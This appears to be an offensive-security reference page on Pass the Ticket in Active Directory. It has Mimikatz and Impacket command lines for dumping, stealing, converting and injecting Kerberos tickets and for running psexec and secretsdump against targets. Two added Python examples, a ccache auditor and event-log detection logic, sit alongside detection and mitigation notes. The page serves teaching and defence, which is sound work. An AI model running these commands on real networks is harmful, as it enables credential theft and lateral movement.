Pass the Ticket
Overview
Pass the Ticket (PtT) uses stolen Kerberos tickets (TGT or TGS) to authenticate to services without knowing the user's password or hash. Unlike Pass the Hash, which relies on NTLM, PtT works with Kerberos authentication, so it remains viable in environments where NTLM is disabled. Tickets can be extracted from memory, obtained from keytabs, or forged (Golden/Silver tickets).
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Prerequisites
- A valid Kerberos ticket (TGT or TGS) in .kirbi or .ccache format
- Network access to the target service
- The ticket must not be expired
Techniques
Extract Tickets from Memory (Windows)
```
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# List all Kerberos tickets in memory
mimikatz# sekurlsa::tickets
# Export all tickets to .kirbi files
mimikatz# sekurlsa::tickets /export
# List tickets in current session
mimikatz# kerberos::list /export
```
Extract Tickets from Memory (Linux)
```bash
# Tickets stored in ccache files
# Default location: /tmp/krb5cc_<uid>
ls -la /tmp/krb5cc_*
# Copy the ccache file
cp /tmp/krb5cc_1000 /tmp/stolen.ccache
```
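A defender's counterpart to the step above, added here as an example and not code from the original page: an audit of a Linux host's credential caches. It finds ccache files by their file header (byte 0x05 followed by the format version byte) rather than by name, so a cache copied to a non-standard path such as /tmp/stolen.ccache is still located, and it flags caches whose owner does not match the uid in the krb5cc_<uid> name or that are readable by other users. The directory layout, file contents and the demo() helper are constructed for this example.

```python
"""Audit Kerberos credential caches (ccache files) on a Linux host.

Added example, not part of the original page. The file-header check relies
on the MIT/Heimdal file ccache format, whose first byte is always 5 and whose
second byte is the format version (1 to 4). Everything else here (directory,
sample files, finding names) is constructed for the demo.
"""
import os
import re
import stat
import tempfile

NAME_RE = re.compile(r"^krb5cc_(\d+)$")


def is_ccache(path):
    """True if the file starts with the ccache magic header (0x05, version 1-4)."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(2)
    except OSError:
        return False
    return len(head) == 2 and head[0] == 5 and 1 <= head[1] <= 4


def audit_entry(name, owner_uid, mode):
    """Pure check on one ccache file's name, owner uid and permission bits.

    Returns a list of finding labels (constructed names for this demo):
      nonstandard_name           cache not named krb5cc_<uid> (e.g. a copied cache)
      owner_uid_mismatch         uid in the name differs from the file owner
      group_or_world_accessible  permission bits allow access by other users
    """
    findings = []
    match = NAME_RE.match(name)
    if match is None:
        findings.append("nonstandard_name")
    elif int(match.group(1)) != owner_uid:
        findings.append("owner_uid_mismatch")
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append("group_or_world_accessible")
    return findings


def audit_directory(directory="/tmp"):
    """Map each ccache file under `directory` with findings to its finding list."""
    results = {}
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if not os.path.isfile(path) or not is_ccache(path):
            continue
        st = os.stat(path)
        findings = audit_entry(name, st.st_uid, stat.S_IMODE(st.st_mode))
        if findings:
            results[path] = findings
    return results


def demo():
    """Build a constructed /tmp-like directory and audit it (demo only)."""
    directory = tempfile.mkdtemp()
    uid = os.getuid()
    clean = os.path.join(directory, "krb5cc_%d" % uid)     # normal per-user cache
    copied = os.path.join(directory, "stolen.ccache")       # copied cache, odd name
    other = os.path.join(directory, "notes.txt")            # not a ccache at all
    header = b"\x05\x04" + b"\x00" * 16                     # constructed v4 header stub
    for path, data in ((clean, header), (copied, header), (other, b"plain text")):
        with open(path, "wb") as fh:
            fh.write(data)
    os.chmod(clean, 0o600)
    os.chmod(copied, 0o644)  # left readable by others, as a careless copy often is
    return {os.path.basename(p): f for p, f in audit_directory(directory).items()}


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, findings)
```

Run audit_directory() against /tmp (and any KRB5CCNAME directories used by local services) from a privileged account; the default krb5 cache is created mode 0600 and owned by the requesting uid, so any finding is worth a look. A cache with a standard name and correct owner but an unexpectedly long remaining lifetime is not caught here; pair this with the short ticket lifetimes listed under Mitigation Strategies.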
Inject Ticket (Windows — Mimikatz)
```
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Purge existing tickets
mimikatz# kerberos::purge
# Inject a .kirbi ticket
mimikatz# kerberos::ptt <ticket.kirbi>
# Verify the injected ticket
mimikatz# kerberos::list
```
After injection, use standard Windows tools (e.g., dir \\dc\c$, PsExec) — they will use the injected ticket.
Use Ticket (Linux — Impacket)
```bash
# Set the KRB5CCNAME environment variable to the ccache file
export KRB5CCNAME=/path/to/ticket.ccache
# Impacket — use ticket for PsExec
# https://github.com/fortra/impacket
impacket-psexec '<domain>/<user>@<target>' -k -no-pass
# Impacket — use ticket for WMIExec
impacket-wmiexec '<domain>/<user>@<target>' -k -no-pass
# Impacket — use ticket for secretsdump
impacket-secretsdump '<domain>/<user>@<target>' -k -no-pass
```
The -k flag tells Impacket to use Kerberos authentication. The -no-pass flag skips password prompts since the ticket provides authentication.
Convert Ticket Formats
```bash
# Impacket — convert .kirbi (Windows) to .ccache (Linux)
# https://github.com/fortra/impacket
impacket-ticketConverter ticket.kirbi ticket.ccache
# Convert .ccache to .kirbi
impacket-ticketConverter ticket.ccache ticket.kirbi
```
Request TGT with Known Credentials
```bash
# Impacket — request TGT with password
# https://github.com/fortra/impacket
impacket-getTGT '<domain>/<user>:<password>' -dc-ip <dc_ip>
# Request TGT with NTLM hash
impacket-getTGT '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>
# Request TGT with AES key
impacket-getTGT '<domain>/<user>' -aesKey <aes256_key> -dc-ip <dc_ip>
```
This creates a .ccache file that can be used with KRB5CCNAME.
Overpass the Hash (NTLM → Kerberos)
Convert an NTLM hash into a Kerberos TGT:
```
# Impacket — request TGT using NTLM hash
# https://github.com/fortra/impacket
impacket-getTGT '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>
export KRB5CCNAME=<user>.ccache
# Now use Kerberos-based tools
impacket-psexec '<domain>/<user>@<target>' -k -no-pass
# Mimikatz — Overpass the Hash
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
```
Detection Methods
Network-Based Detection
- Kerberos ticket requests from unusual source hosts
- TGS requests from hosts that did not previously request a TGT
Host-Based Detection
- Windows Security Event 4768 (TGT request) from unexpected accounts
- Windows Security Event 4769 (TGS request) for services the account doesn't normally access
- Mimikatz execution artifacts in process memory
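The three log-based indicators above (TGS requests from a host with no preceding TGT request, TGS requests for services outside an account's baseline, and TGT requests from unexpected accounts) expressed as detection logic, added here as an example and not code from the original page. The event records are constructed and use a simplified dict layout; the field names id, time, account, client_ip and service are assumptions for the demo and must be mapped to the real 4768/4769 fields (the requesting host is the event's Client Address) when run over exported logs.

```python
"""Detection logic for the Pass-the-Ticket indicators listed above.

Added example, not code from the original page. Events are constructed
sample records; the baselines and the 10-hour lookback window are
assumptions for this demo.
"""
from datetime import datetime, timedelta

# Constructed sample events, modelled on a single DC's 4768/4769 log.
SAMPLE_EVENTS = [
    # Normal: alice gets a TGT on her workstation, then a service ticket she uses daily.
    {"id": 4768, "time": "2024-05-01T08:00:00", "account": "alice",
     "client_ip": "10.0.0.10", "service": "krbtgt"},
    {"id": 4769, "time": "2024-05-01T08:00:05", "account": "alice",
     "client_ip": "10.0.0.10", "service": "cifs/fileserver"},
    # Suspicious: TGS request for alice from a host that never requested a TGT
    # for her (what a ticket injected on another machine looks like on the DC).
    {"id": 4769, "time": "2024-05-01T09:10:00", "account": "alice",
     "client_ip": "10.0.0.55", "service": "cifs/dc01"},
    # Suspicious: a service outside alice's usual set, even from her own host.
    {"id": 4769, "time": "2024-05-01T09:11:00", "account": "alice",
     "client_ip": "10.0.0.10", "service": "host/sqlserver"},
    # Suspicious: TGT request by an account not expected to authenticate this way.
    {"id": 4768, "time": "2024-05-01T09:20:00", "account": "svc-backup",
     "client_ip": "10.0.0.77", "service": "krbtgt"},
]

# Constructed baselines; in practice derive these from historical 4768/4769 data.
BASELINE_SERVICES = {"alice": {"cifs/fileserver", "ldap/dc01"}}
EXPECTED_TGT_ACCOUNTS = {"alice", "bob"}
# Assumption: a 10-hour lookback, matching a common maximum TGT lifetime, so a
# TGS request only counts as "covered" by a TGT that could still be valid.
TGT_WINDOW = timedelta(hours=10)


def detect_ptt(events, baseline=BASELINE_SERVICES,
               expected_tgt_accounts=EXPECTED_TGT_ACCOUNTS, window=TGT_WINDOW):
    """Return (indicator, account, detail) tuples, one per matched indicator."""
    alerts = []
    last_tgt = {}  # (account, client_ip) -> time of the most recent 4768
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        when = datetime.fromisoformat(ev["time"])
        key = (ev["account"], ev["client_ip"])
        if ev["id"] == 4768:
            last_tgt[key] = when
            if ev["account"] not in expected_tgt_accounts:
                alerts.append(("tgt_unexpected_account", ev["account"], ev["client_ip"]))
        elif ev["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or when - seen > window:
                alerts.append(("tgs_without_tgt", ev["account"], ev["client_ip"]))
            if ev["service"] not in baseline.get(ev["account"], set()):
                alerts.append(("tgs_unusual_service", ev["account"], ev["service"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_ptt(SAMPLE_EVENTS):
        print(alert)
```

Two caveats when moving this off sample data: in a multi-DC domain the TGT and the later TGS may be issued by different DCs, so the 4768 and 4769 streams must be merged before the lookback check, and the window should be set from the domain's actual maximum TGT lifetime (the shorter it is, per the Mitigation Strategies below, the tighter this check becomes).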
Mitigation Strategies
- Credential Guard — protects TGTs and NTLM hashes in LSASS (does not protect TGS service tickets)
- Short ticket lifetimes — reduce the window for stolen tickets
- Protected Users group — enforces Kerberos constraints, prevents delegation
- Monitor for anomalous Kerberos usage — alert on tickets used from unusual hosts